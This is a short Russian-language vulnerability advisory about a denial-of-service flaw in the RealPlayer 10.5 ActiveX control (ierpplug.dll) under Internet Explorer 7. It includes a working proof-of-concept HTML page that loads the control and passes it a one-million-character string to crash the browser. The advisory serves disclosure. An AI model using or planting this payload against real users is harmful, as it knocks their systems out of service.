Программа: Internet Explorer 7 RealPlayer 10.5 ActiveX

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных в RealPlayer ActiveX компоненте в ierpplug.dll. Атакующий может передать приложению злонамеренные данные, что приведет к отказу системы в обслуживании.

Пример:

<html>
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<script language='vbscript'>

argCount   = 2

arg1="default"
arg2=String(1000000, "A")

RealPlayer.OpenURLInPlayerBrowser arg1 ,arg2

</script>
 



Оставить мнение